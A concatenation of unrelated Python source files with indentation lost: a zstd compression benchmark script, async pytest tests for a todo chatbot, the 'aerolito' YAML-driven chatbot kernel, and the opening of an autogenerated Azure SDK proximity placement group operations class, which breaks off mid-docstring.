raise Exception("unexpected chunk encoding: %s" % encoding)
if chunk_size is not None:
chunks.extend(
[
data[i : i + chunk_size]
for i in range(0, len(data), chunk_size)
]
)
else:
chunks.append(data)
for path in paths:
if os.path.isdir(path):
for root, dirs, files in os.walk(path):
dirs.sort()
for f in sorted(files):
try:
process_file(os.path.join(root, f))
if limit_count and len(chunks) >= limit_count:
return chunks
except IOError:
pass
else:
process_file(path)
if limit_count and len(chunks) >= limit_count:
return chunks
return chunks
def get_benches(mode, direction, zlib=False):
assert direction in ("compress", "decompress")
prefix = "%s_" % direction
fns = []
for fn in BENCHES:
if not fn.__name__.startswith(prefix):
continue
if fn.mode != mode:
continue
if fn.zlib != zlib:
continue
if zstd.backend == "cffi" and not fn.cffi:
continue
fns.append(fn)
return fns
def format_results(results, title, prefix, total_size):
best = min(results)
rate = float(total_size) / best[3]
print("%s %s" % (prefix, title))
print(
"%.6f wall; %.6f CPU; %.6f user; %.6f sys %.2f MB/s (best of %d)"
% (best[3], best[0], best[1], best[2], rate / 1000000.0, len(results))
)
def bench_discrete_zlib_compression(chunks, opts):
total_size = sum(map(len, chunks))
for fn in get_benches("discrete", "compress", zlib=True):
results = timer(lambda: fn(chunks, opts))
format_results(results, fn.title, "compress discrete zlib", total_size)
def bench_discrete_zlib_decompression(chunks, total_size):
for fn in get_benches("discrete", "decompress", zlib=True):
results = timer(lambda: fn(chunks))
format_results(
results, fn.title, "decompress discrete zlib", total_size
)
def bench_discrete_compression(
chunks, zparams, cover=False, dict_data=None, batch_threads=None
):
total_size = sum(map(len, chunks))
if dict_data:
if cover:
prefix = "compress discrete cover dict"
else:
prefix = "compress discrete dict"
else:
prefix = "compress discrete"
for fn in get_benches("discrete", "compress"):
chunks_arg = chunks
kwargs = {}
if fn.threads_arg:
kwargs["threads"] = batch_threads
if fn.chunks_as_buffer:
s = struct.Struct("=QQ")
offsets = io.BytesIO()
current_offset = 0
for chunk in chunks:
offsets.write(s.pack(current_offset, len(chunk)))
current_offset += len(chunk)
chunks_arg = zstd.BufferWithSegments(
b"".join(chunks), offsets.getvalue()
)
results = timer(lambda: fn(chunks_arg, zparams, **kwargs))
format_results(results, fn.title, prefix, total_size)
def bench_discrete_decompression(
orig_chunks,
compressed_chunks,
total_size,
zparams,
dict_data=None,
batch_threads=None,
):
dopts = {}
if dict_data:
dopts["dict_data"] = dict_data
prefix = "decompress discrete dict"
else:
prefix = "decompress discrete"
for fn in get_benches("discrete", "decompress"):
if not zparams.write_content_size and fn.require_content_size:
continue
chunks_arg = compressed_chunks
kwargs = {}
if fn.threads_arg:
kwargs["threads"] = batch_threads
# Pass compressed frames in a BufferWithSegments rather than a list
# of bytes.
if fn.chunks_as_buffer:
s = struct.Struct("=QQ")
offsets = io.BytesIO()
current_offset = 0
for chunk in compressed_chunks:
offsets.write(s.pack(current_offset, len(chunk)))
current_offset += len(chunk)
chunks_arg = zstd.BufferWithSegments(
b"".join(compressed_chunks), offsets.getvalue()
)
if fn.decompressed_sizes_arg:
# Ideally we'd use array.array here. But Python 2 doesn't support the
# Q format.
s = struct.Struct("=Q")
kwargs["decompressed_sizes"] = b"".join(
s.pack(len(c)) for c in orig_chunks
)
results = timer(lambda: fn(chunks_arg, dopts, **kwargs))
format_results(results, fn.title, prefix, total_size)
def bench_stream_compression(chunks, zparams):
total_size = sum(map(len, chunks))
for fn in get_benches("stream", "compress"):
results = timer(lambda: fn(chunks, zparams))
format_results(results, fn.title, "compress stream", total_size)
def bench_stream_decompression(chunks, total_size):
for fn in get_benches("stream", "decompress"):
results = timer(lambda: fn(chunks, {}))
format_results(results, fn.title, "decompress stream", total_size)
def bench_stream_zlib_compression(chunks, opts):
total_size = sum(map(len, chunks))
for fn in get_benches("stream", "compress", zlib=True):
results = timer(lambda: fn(chunks, opts))
format_results(results, fn.title, "compress stream zlib", total_size)
def bench_stream_zlib_decompression(chunks, total_size):
for fn in get_benches("stream", "decompress", zlib=True):
results = timer(lambda: fn(chunks))
format_results(results, fn.title, "decompress stream zlib", total_size)
def bench_content_dict_compression(chunks, zparams):
total_size = sum(map(len, chunks))
for fn in get_benches("content-dict", "compress"):
results = timer(lambda: fn(chunks, zparams))
format_results(results, fn.title, "compress content dict", total_size)
def bench_content_dict_decompression(chunks, total_size, zparams):
for fn in get_benches("content-dict", "decompress"):
if not zparams.write_content_size and fn.require_content_size:
continue
results = timer(lambda: fn(chunks, {}))
format_results(results, fn.title, "decompress content dict", total_size)
if __name__ == "__main__":
import argparse
random.seed(42)
parser = argparse.ArgumentParser()
group = parser.add_argument_group("Compression Modes")
group.add_argument(
"--discrete",
action="store_true",
help="Compress each input independently",
)
group.add_argument(
"--stream",
action="store_true",
help="Feed each input into a stream and emit " "flushed blocks",
)
group.add_argument(
"--content-dict",
action="store_true",
help="Compress each input using the previous as a "
"content dictionary",
)
group.add_argument(
"--discrete-dict",
action="store_true",
help="Compress each input independently with a " "dictionary",
)
group = parser.add_argument_group("Benchmark Selection")
group.add_argument(
"--no-compression",
action="store_true",
help="Do not test compression performance",
)
group.add_argument(
"--no-decompression",
action="store_true",
help="Do not test decompression performance",
)
group.add_argument(
"--only-simple", action="store_true", help="Only run the simple APIs"
)
group.add_argument(
"--zlib", action="store_true", help="Benchmark against zlib"
)
group = parser.add_argument_group("Compression Parameters")
group.add_argument(
"-l", "--level", type=int, default=3, help="Compression level"
)
group.add_argument(
"--no-write-size",
action="store_true",
help="Do not write content size to zstd frames",
)
group.add_argument(
"--write-checksum",
action="store_true",
help="Write checksum data to zstd frames",
)
group.add_argument(
"--dict-size",
type=int,
default=128 * 1024,
help="Maximum size of trained dictionary",
)
group.add_argument(
"--enable-ldm",
action="store_true",
help="Enable long distance matching",
)
group.add_argument(
"--ldm-hash-log",
type=int,
help="Long distance matching hash log value. Power of 2",
)
group.add_argument(
"--compress-threads",
type=int,
help="Use multi-threaded compression with this many " "threads",
)
group.add_argument(
"--batch-threads",
type=int,
default=0,
help="Use this many threads for batch APIs",
)
group.add_argument(
"--cover-k",
type=int,
default=0,
help="Segment size parameter to COVER algorithm",
)
group.add_argument(
"--cover-d",
type=int,
default=0,
help="Dmer size parameter to COVER algorithm",
)
group.add_argument(
"--zlib-level", type=int, default=6, help="zlib compression level"
)
group = parser.add_argument_group("Input Processing")
group.add_argument(
"--limit-count", type=int, help="limit number of input files added"
)
group.add_argument(
"--dict-sample-limit",
type=int,
help="limit how many samples are fed into dictionary " "training",
)
group.add_argument(
"--chunk-encoding",
choices=["raw", "zlib"],
default="raw",
help="How input chunks are encoded. Can be used to "
"pass compressed chunks for benchmarking",
)
group.add_argument(
"--split-input-size",
type=int,
help="Split inputs into chunks so they are at most this " "many bytes",
)
parser.add_argument("path", metavar="PATH", nargs="+")
args = parser.parse_args()
# If no compression mode defined, assume discrete.
if not args.stream and not args.content_dict and not args.discrete_dict:
args.discrete = True
# It is easier to filter here than to pass arguments to multiple
# functions.
if args.only_simple:
BENCHES[:] = [fn for fn in BENCHES if fn.simple]
params = {
"write_content_size": True,
}
if args.no_write_size:
params["write_content_size"] = False
if args.write_checksum:
params["write_checksum"] = True
if args.compress_threads:
params["threads"] = args.compress_threads
if args.enable_ldm:
params["enable_ldm"] = True
if args.ldm_hash_log:
params["ldm_hash_log"] = args.ldm_hash_log
zparams = zstd.ZstdCompressionParameters.from_level(args.level, **params)
if args.compress_threads:
threads_zparams = zstd.ZstdCompressionParameters.from_level(
args.level, **params
)
chunks = get_chunks(
args.path,
args.limit_count,
args.chunk_encoding,
chunk_size=args.split_input_size,
)
orig_size = sum(map(len, chunks))
print("%d chunks; %d bytes" % (len(chunks), orig_size))
if args.discrete_dict:
if args.dict_sample_limit:
training_chunks = random.sample(chunks, args.dict_sample_limit)
else:
training_chunks = chunks
train_args = {
"level": args.level,
}
if args.cover_k:
train_args["k"] = args.cover_k
if args.cover_d:
train_args["d"] = args.cover_d
# Always use all available threads in optimize mode.
train_args["threads"] = -1
dict_data = zstd.train_dictionary(
args.dict_size, training_chunks, **train_args
)
print(
"trained dictionary of size %d (wanted %d) (l=%d)"
% (len(dict_data), args.dict_size, args.level)
)
if args.zlib and args.discrete:
compressed_discrete_zlib = []
ratios = []
for chunk in chunks:
c = zlib.compress(chunk, args.zlib_level)
compressed_discrete_zlib.append(c)
ratios.append(float(len(c)) / float(len(chunk)))
compressed_size = sum(map(len, compressed_discrete_zlib))
ratio = float(compressed_size) / float(orig_size) * 100.0
bad_count = sum(1 for r in ratios if r >= 1.00)
good_ratio = 100.0 - (float(bad_count) / float(len(chunks)) * 100.0)
print(
"zlib discrete compressed size (l=%d): %d (%.2f%%); smaller: %.2f%%"
% (args.zlib_level, compressed_size, ratio, good_ratio)
)
# In discrete mode, each input is compressed independently, possibly
# with a dictionary.
if args.discrete:
zctx = zstd.ZstdCompressor(compression_params=zparams)
compressed_discrete = []
ratios = []
# Always use multiple threads here so we complete faster.
if hasattr(zctx, "multi_compress_to_buffer"):
for i, c in enumerate(
zctx.multi_compress_to_buffer(chunks, threads=-1)
):
compressed_discrete.append(c.tobytes())
ratios.append(float(len(c)) / float(len(chunks[i])))
else:
for chunk in chunks:
compressed = zctx.compress(chunk)
compressed_discrete.append(chunk)
ratios.append(float(len(compressed)) / float(len(chunk)))
compressed_size = sum(map(len, compressed_discrete))
ratio = float(compressed_size) / float(orig_size) * 100.0
bad_count = sum(1 for r in ratios if r >= 1.00)
good_ratio = 100.0 - (float(bad_count) / float(len(chunks)) * 100.0)
print(
"discrete compressed size (l=%d): %d (%.2f%%); smaller: %.2f%%"
% (args.level, compressed_size, ratio, good_ratio)
)
# Discrete dict mode is like discrete but trains a dictionary.
if args.discrete_dict:
zctx = zstd.ZstdCompressor(
dict_data=dict_data, compression_params=zparams
)
compressed_discrete_dict = []
ratios = []
if hasattr(zctx, "multi_compress_to_buffer"):
for i, c in enumerate(
zctx.multi_compress_to_buffer(chunks, threads=-1)
):
compressed_discrete_dict.append(c.tobytes())
ratios.append(float(len(c)) / float(len(chunks[i])))
else:
for chunk in chunks:
compressed = zctx.compress(chunk)
compressed_discrete_dict.append(compressed)
ratios.append(float(len(compressed)) / float(len(chunk)))
compressed_size = sum(map(len, compressed_discrete_dict))
ratio = float(compressed_size) / float(orig_size) * 100.0
bad_count = sum(1 for r in ratios if r >= 1.00)
good_ratio = 100.0 - (float(bad_count) / float(len(chunks)) * 100.0)
print(
"discrete dict compressed size (l=%d): %d (%.2f%%); smaller: %.2f%%"
% (args.level, compressed_size, ratio, good_ratio)
)
# In stream mode the inputs are fed into a streaming compressor and
# blocks are flushed for each input.
if args.zlib and args.stream:
compressed_stream_zlib = []
ratios = []
compressor = zlib.compressobj(args.zlib_level)
for chunk in chunks:
output = compressor.compress(chunk)
output += compressor.flush(zlib.Z_SYNC_FLUSH)
compressed_stream_zlib.append(output)
compressed_size = sum(map(len, compressed_stream_zlib))
ratio = float(compressed_size) / float(orig_size) * 100.0
print(
"stream zlib compressed size (l=%d): %d (%.2f%%)"
% (args.zlib_level, compressed_size, ratio)
)
if args.stream:
zctx = zstd.ZstdCompressor(compression_params=zparams)
compressed_stream = []
ratios = []
compressor = zctx.compressobj()
for chunk in chunks:
output = compressor.compress(chunk)
output += compressor.flush(zstd.COMPRESSOBJ_FLUSH_BLOCK)
compressed_stream.append(output)
compressed_size = sum(map(len, compressed_stream))
ratio = float(compressed_size) / float(orig_size) * 100.0
print(
"stream compressed size (l=%d): %d (%.2f%%)"
% (zparams.compression_level, compressed_size, ratio)
)
if args.content_dict:
compressed_content_dict = []
ratios = []
# First chunk is compressed like normal.
c = zstd.ZstdCompressor(compression_params=zparams).compress(chunks[0])
compressed_content_dict.append(c)
ratios.append(float(len(c)) / float(len(chunks[0])))
# Subsequent chunks use previous chunk as a dict.
for i, chunk in enumerate(chunks[1:]):
d = zstd.ZstdCompressionDict(chunks[i])
zctx = zstd.ZstdCompressor(dict_data=d, compression_params=zparams)
c = zctx.compress(chunk)
compressed_content_dict.append(c)
ratios.append(float(len(c)) / float(len(chunk)))
compressed_size = sum(map(len, compressed_content_dict))
ratio = float(compressed_size) / float(orig_size) * 100.0
bad_count = sum(1 for r in ratios if r >= 1.00)
good_ratio = 100.0 - (float(bad_count) / float(len(chunks)) * 100.0)
print(
"content dict compressed size (l=%d): %d (%.2f%%); smaller: %.2f%%"
% (zparams.compression_level, compressed_size, ratio, good_ratio)
)
print("")
if not args.no_compression:
if args.zlib and args.discrete:
bench_discrete_zlib_compression(
chunks, {"zlib_level": args.zlib_level}
)
if args.discrete:
bench_discrete_compression(
chunks, zparams, batch_threads=args.batch_threads
)
if args.discrete_dict:
bench_discrete_compression(
chunks,
zparams,
batch_threads=args.batch_threads,
dict_data=dict_data,
)
if args.zlib and args.stream:
bench_stream_zlib_compression(
chunks, {"zlib_level": args.zlib_level}
)
if args.stream:
bench_stream_compression(chunks, zparams)
if args.content_dict:
bench_content_dict_compression(chunks, zparams)
if not args.no_decompression:
print("")
if not args.no_decompression:
if args.zlib and args.discrete:
bench_discrete_zlib_decompression(
compressed_discrete_zlib, orig_size
)
if args.discrete:
bench_discrete_decompression(
chunks,
compressed_discrete,
orig_size,
zparams,
batch_threads=args.batch_threads,
)
if args.discrete_dict:
bench_discrete_decompression(
chunks,
compressed_discrete_dict,
orig_size,
zparams,
dict_data=dict_data,
batch_threads=args.batch_threads,
)
if args.zlib and args.stream:
bench_stream_zlib_decompression(compressed_stream_zlib, orig_size)
if args.stream:
bench_stream_decompression(compressed_stream, orig_size)
if args.content_dict:
bench_content_dict_decompression(
compressed_content_dict, orig_size, zparams
)
| |
import emoji
import logging
import pytest
from todo.tasks import tasks_document
from todo.test_helpers import env
logger = logging.getLogger(__name__)
@pytest.mark.asyncio
@pytest.mark.parametrize(('task_idx', 'command_tmpl', 'should_get_answer', 'should_get_state'), [
(0, 'REOPEN_TASK_{}', ':ok: Task `{}` was opened', 'open'),
(0, 'DONE_TASK_{}', 'Task `{}` is already done', 'done'),
(1, 'STOP_TASK_{}', ':ok: Task `{}` was stopped', 'open'),
(1, 'DONE_TASK_{}', ':ok: Task `{}` was done', 'done'),
(1, 'START_TASK_{}', 'Task `{}` is already in progress', 'in progress'),
(2, 'START_TASK_{}', ':ok: Task `{}` was started', 'in progress'),
(2, 'REOPEN_TASK_{}', 'Task `{}` is already opened', 'open'),
(2, 'STOP_TASK_{}', 'Task `{}` is already stopped', 'open'),
])
async def test_change_state_of_task_by_postback(
build_context, task_idx, command_tmpl, should_get_answer, should_get_state):
async with build_context() as ctx:
created_tasks = await ctx.add_test_tasks()
target_task_id = created_tasks[task_idx]._id
# Alice:
await ctx.dialog([
env.build_postback(command_tmpl.format(target_task_id)),
])
task_after_command = await tasks_document.TaskDocument.objects.find_by_id(target_task_id)
# Bob:
await ctx.dialog([
None,
should_get_answer.format(task_after_command.description),
])
assert task_after_command.state == should_get_state
@pytest.mark.asyncio
@pytest.mark.parametrize(('init_state', 'command', 'should_get_answer', 'should_get_state'), [
('done', 'reopen', ':ok: Task `{}` was opened', 'open'),
('done', 'open last', ':ok: Task `{}` was opened', 'open'),
('open', 'open last', 'Task `{}` is already opened', 'open'),
('open', 'start', ':ok: Task `{}` was started', 'in progress'),
('open', 'start last', ':ok: Task `{}` was started', 'in progress'),
('open', 'start task', ':ok: Task `{}` was started', 'in progress'),
('in progress', 'start last', 'Task `{}` is already in progress', 'in progress'),
('in progress', 'stop', ':ok: Task `{}` was stopped', 'open'),
('in progress', 'stop last', ':ok: Task `{}` was stopped', 'open'),
('open', 'stop last', 'Task `{}` is already stopped', 'open'),
('in progress', 'done', ':ok: Task `{}` was done', 'done'),
('in progress', 'done last', ':ok: Task `{}` was done', 'done'),
('done', 'done last', 'Task `{}` is already done', 'done'),
])
async def test_change_state_of_last_task(
build_context, init_state, command, should_get_answer, should_get_state):
async with build_context() as ctx:
created_tasks = await ctx.add_test_tasks(init_state)
last_task_id = created_tasks[-1]._id
# Alice:
await ctx.dialog([
command,
])
task_after_command = await tasks_document.TaskDocument.objects.find_by_id(last_task_id)
# Bob:
await ctx.dialog([
None,
should_get_answer.format(task_after_command.description),
])
assert task_after_command.state == should_get_state
@pytest.mark.asyncio
async def test_start_certain_task(build_context):
async with build_context() as ctx:
created_tasks = await ctx.add_test_tasks(props=[{
'state': 'open',
}, {
'state': 'open',
}, {
'state': 'open',
}])
task_1 = created_tasks[-1]
task_2 = created_tasks[-2]
list_of_modified_tasks = '\n'.join(
[emoji.emojize(':white_check_mark: {}').format(t) for t in [
task_1.description, task_2.description
]])
await ctx.dialog([
# Alice:
env.build_postback('START_TASKS_{},{}'.format(task_1._id, task_2._id)),
# Bob:
':ok: Tasks were started:\n{}'.format(list_of_modified_tasks),
])
@pytest.mark.asyncio
@pytest.mark.parametrize(('command', 'should_get_answer', 'should_get_states'), [
('open all', ':ok: Task was opened:\n{}', ['open', 'in progress']),
(env.build_postback('REOPEN_ALL_TASK'), ':ok: Task was opened:\n{}', ['open', 'in progress']),
('start all', ':ok: Task was started:\n{}', ['in progress', 'done']),
(env.build_postback('START_ALL_TASK'), ':ok: Task was started:\n{}', ['in progress', 'done']),
('stop all', ':ok: Task was stopped:\n{}', ['open', 'done']),
(env.build_postback('STOP_ALL_TASK'), ':ok: Task was stopped:\n{}', ['open', 'done']),
('done all', ':ok: Tasks were done:\n{}', ['done']),
(env.build_postback('DONE_ALL_TASK'), ':ok: Tasks were done:\n{}', ['done']),
])
async def test_change_state_of_all_tasks(
build_context, command, should_get_answer, should_get_states):
async with build_context() as ctx:
created_tasks = await ctx.add_test_tasks()
description_of_tasks_that_will_be_modified = [
t.description for t in created_tasks if t.state not in should_get_states
]
# Alice:
await ctx.dialog([
command,
])
for t in created_tasks:
task_after_command = await tasks_document.TaskDocument.objects.find_by_id(t._id)
assert task_after_command.state in should_get_states
list_of_modified_tasks = '\n'.join(
[emoji.emojize(':white_check_mark: {}').format(t) for t in description_of_tasks_that_will_be_modified])
# Bob:
await ctx.dialog([
None,
should_get_answer.format(list_of_modified_tasks),
])
@pytest.mark.asyncio
@pytest.mark.parametrize(('command', 'command_name'), [
('open all', 'open'),
('start all', 'start'),
('stop all', 'stop'),
('done all', 'done'),
])
async def test_warn_if_there_is_no_tasks_to_apply_changes_for_all(
build_context, command, command_name):
async with build_context() as ctx:
await ctx.dialog([
# Alice:
command,
# Bob:
'There is no task to {}'.format(command_name),
])
@pytest.mark.asyncio
@pytest.mark.parametrize(('command', 'command_name'), [
('open last', 'open'),
('start last', 'start'),
('stop last', 'stop'),
('done last', 'done'),
])
async def test_warn_if_there_is_no_tasks_to_apply_changes_for_all(
build_context, command, command_name):
async with build_context() as ctx:
await ctx.dialog([
# Alice:
command,
# Bob:
'You do not have any task to {}'.format(command_name),
])
@pytest.mark.asyncio
@pytest.mark.parametrize('command', [
env.build_postback('STOP_TASK_58ec13b91c8dea00012fa1a2'),
env.build_postback('DONE_TASK_58ec13b91c8dea00012fa1a2'),
env.build_postback('START_TASK_58ec13b91c8dea00012fa1a2'),
env.build_postback('START_TASK_58ec13b91c8dea00012fa1a2'),
])
async def test_warn_if_there_is_no_tasks_to_apply_changes_for_all(build_context, command):
async with build_context() as ctx:
await ctx.dialog([
# Alice:
command,
# Bob:
{
'text': ':confused: I can\'t find that task. Do you mean something else?',
'quick_replies': [{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
},
],
},
])
| |
# -*- coding:utf-8 -*-
# Copyright (c) 2011 Renato de Pontes Pereira, renato.ppontes at gmail dot com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import yaml
import codecs
from aerolito import exceptions
from aerolito import directives
from aerolito.pattern import Pattern
from aerolito.pattern import remove_accents
from aerolito.pattern import normalize_input
class Kernel(object):
u"""
Aerolito's main object.
Kernel uses an environment variable for session and variables controlling.
Sessions are used for user-dependent information storage, such inputs and
outputs logs, and local variables. Variables are devided into 3 levels:
*stars* for pattern stars ``*``, *locals* for user-related informations,
and *globals*.
By default kernel sets the first users as "default" key. It session can be
acessed via ``_environ['session']['default']``. A kernel object have 4
instance variables:
_patterns
A list of all patterns that kernel is handling.
_synonyms
A list of all *synonyms*.
_meanings
A list of all *meanings*.
_environ
The environment variable.
"""
def __init__(self, config_file, encoding='utf-8'):
u"""Initializes a kernel object, creating the user "default". """
self._patterns = None
self._synonyms = None
self._meanings = None
self._environ = None
self.load_config(config_file, encoding=encoding)
self.add_user('default')
self.set_user('default')
def add_user(self, user_id):
u"""
Add a new user in session of environ variable, initializing the
following user-dependet variables:
- **inputs**: List with all inputs of an user.
- **responses**: List with all outputs for an user, without
normalizing.
- **responses-normalized**: List with all outputs normalized.
- **stars**: Pattern-related variables, is a list of stars that matches
with recognized pattern (i.e., words in the place of "\*"). Is filled
by ``after`` and ``in`` tags.
- **locals**: Dictionary of local variables, setted via patterns in
``when`` or ``post`` tags.
If ``user_id`` is already in session, an exception
``UserAlreadyInSession`` is rised.
"""
if user_id in self._environ['session']:
raise exceptions.UserAlreadyInSession(user_id)
self._environ['session'][user_id] = {}
session = self._environ['session'][user_id]
session['inputs'] = []
session['responses'] = []
session['responses-normalized'] = []
session['stars'] = []
session['locals'] = {}
def set_user(self, user_id):
u"""
Defines who is the active user in session. Functions and objects uses
``_environ['user_id']`` variable to select the correct session.
"""
self._environ['user_id'] = user_id
def remove_user(self, user_id):
u"""
Removes an user from session.
"""
if user_id in self._environ['session']:
del self._environ['session'][user_id]
def add_directive(self, name, directive):
u"""
Add a new directive in environment var.
"""
if self._environ['directives'].has_key(name):
raise DuplicatedDirective(name)
self._environ['directives'][name] = directive(self._environ)
def __load_directives(self):
u"""
Loads default directives and directives of
``directives._directive_pool``, setted via
``directives.register_directive`` by users.
"""
env_directives = self._environ['directives']
env_directives['define'] = directives.Define(self._environ)
env_directives['delete'] = directives.Delete(self._environ)
env_directives['isdefined'] = directives.IsDefined(self._environ)
env_directives['isnotdefined'] = directives.IsNotDefined(self._environ)
env_directives['equal'] = directives.Equal(self._environ)
env_directives['notequal'] = directives.NotEqual(self._environ)
env_directives['greaterthan'] = directives.GreaterThan(self._environ)
env_directives['lessthan'] = directives.LessThan(self._environ)
env_directives['greaterequal'] = directives.GreaterEqual(self._environ)
env_directives['lessequal'] = directives.LessEqual(self._environ)
for k, item in directives._directive_pool.iteritems():
self.add_directive(k, item)
def load_config(self, config_file, encoding='utf-8'):
u"""
Loads the configuration file.
Receive as parameters a name (with relative or full path) of
configuration file, and its encoding. Default encoding is utf-8.
The configuration file have a mandatory tag **conversations**, that
specify the conversation files. Is a list with the names (with relative
or full path) of the files.
Each kernel can load only one of configuration files, if this method is
called two times, the second call will override the previous
informations (by environ variable).
"""
try:
plain_text = codecs.open(config_file, 'rb', encoding).read()
config = yaml.load(plain_text)
except IOError:
raise exceptions.FileNotFound(config_file)
# Initialize environment dict
self._environ = {
'user_id': None,
'meanings': None,
'synonyms': None,
'directives': {},
'globals': config,
'session': {},
}
self.__load_directives()
if 'conversations' not in config:
raise exceptions.MissingTag('conversations', 'config')
self._synonyms = {}
self._meanings = {}
self._patterns = []
self._environ['synonyms'] = self._synonyms
self._environ['meanings'] = self._meanings
for synonym_file in config.get('synonyms', []):
self.load_sysnonym(synonym_file, encoding)
for meaning_file in config.get('meanings', []):
self.load_meaning(meaning_file, encoding)
for conversation_file in config['conversations']:
self.load_conversation(conversation_file, encoding)
def load_sysnonym(self, synonym_file, encoding='utf-8'):
u"""
Load a synonym file.
Receive as parameters a name (with relative or full path) of a
synonym file, and their encoding. Default encoding is utf-8.
Synonym file must have at least one element. Contains a list of lists.
The patterns are loaded in ``_synonyms``
"""
try:
plain_text = codecs.open(synonym_file, 'rb', encoding).read()
data = yaml.load(plain_text)
except IOError:
raise exceptions.FileNotFound(synonym_file)
for synonyms in data:
if len(synonyms) < 2:
raise exceptions.InvalidTagValue(
u'Synonym list must have more than one element.')
key = remove_accents(synonyms[0]).lower()
vals = [remove_accents(value).lower() for value in synonyms[1:]]
if key in self._synonyms:
raise exceptions.DuplicatedSynonym(key, synonym_file)
self._synonyms[key] = vals
def load_meaning(self, meaning_file, encoding='utf-8'):
u"""
Load a meaning file.
Receive as parameters a name (with relative or full path) of a
meaning file, and their encoding. Default encoding is utf-8.
Meaning file must have at least one element. Contains a list of lists.
The patterns are loaded in ``_meanings``
"""
try:
plain_text = codecs.open(meaning_file, 'rb', encoding).read()
data = yaml.load(plain_text)
except IOError:
raise exceptions.FileNotFound(meaning_file)
for meanings, values in data.items():
if len(values) == 0:
raise exceptions.InvalidTagValue(
u'Meaning list must have one or more element.')
key = remove_accents(meanings).lower()
vals = [normalize_input(v, self._environ['synonyms']).lower() for v in values]
if key in self._meanings:
raise exceptions.DuplicatedMeaning(key, meaning_file)
self._meanings[key] = vals
def load_conversation(self, conversation_file, encoding='utf-8'):
u"""
Load a conversation file.
Receive as parameters a name (with relative or full path) of a
conversation file, and their encoding. Default encoding is utf-8.
The conversations file have a obrigatory tag **patterns**, that specify
the conversation patterns. Is a list of dictonaries.
The patterns are loaded in ``_patterns``
"""
try:
plain_text = codecs.open(conversation_file, 'rb', encoding).read()
data = yaml.load(plain_text)
except IOError:
raise exceptions.FileNotFound(conversation_file)
if 'patterns' not in data:
raise exceptions.MissingTag('patterns', conversation_file)
for p in data['patterns']:
pattern = Pattern(p, self._environ)
self._patterns.append(pattern)
def respond(self, value, user_id=None, registry=True):
u"""
Returns a response for a given user input.
Parameters ``value`` is the user input.
If ``user_id`` is informed, the kernel changes the session for this user,
if parameter is null, kernel keeps the active user. If user is not
informed and no user is active, kernel try to use the *'default'* user,
if default is not avaliable (out of session pool) an exception is
raised.
This method just can be used after environment initialization.
"""
# Verify initialization
if not self._environ :
raise exceptions.InitializationRequired('configuration')
elif not self._patterns:
raise exceptions.InitializationRequired('conversation')
# Verify user's session
if user_id is not None:
self.set_user(user_id)
elif self._environ['user_id'] is None:
if 'default' in self._environ['session']:
self.set_user('default')
else:
raise exceptions.NoUserActiveInSession()
output = None
value = normalize_input(value, self._synonyms)
for pattern in self._patterns:
if pattern.match(value, self._environ):
output = pattern.choice_output(self._environ)
pattern.execute_post(self._environ)
break
session = self._environ['session'][self._environ['user_id']]
if registry:
session['inputs'].append(value)
if output:
recursive = re.findall('\(rec\|([^\)]*)\)', output)
for r in recursive:
toreplace = u'(rec|%s)'%r
resp = self.respond(r, registry=False) or ''
output = output.replace(toreplace, resp)
if registry:
session['responses'].append(output)
session['responses-normalized'].append(normalize_input(output, self._synonyms))
return output
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._proximity_placement_groups_operations import build_create_or_update_request, build_delete_request, build_get_request, build_list_by_resource_group_request, build_list_by_subscription_request, build_update_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ProximityPlacementGroupsOperations:
"""ProximityPlacementGroupsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2020_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def create_or_update(
self,
resource_group_name: str,
proximity_placement_group_name: str,
parameters: "_models.ProximityPlacementGroup",
**kwargs: Any
) -> "_models.ProximityPlacementGroup":
"""Create or update a proximity placement group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param proximity_placement_group_name: The name of the proximity placement group.
:type proximity_placement_group_name: str
:param parameters: Parameters supplied to the Create Proximity Placement Group operation.
:type parameters: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroup
:keyword callable cls: A custom type or function that will be passed the direct response
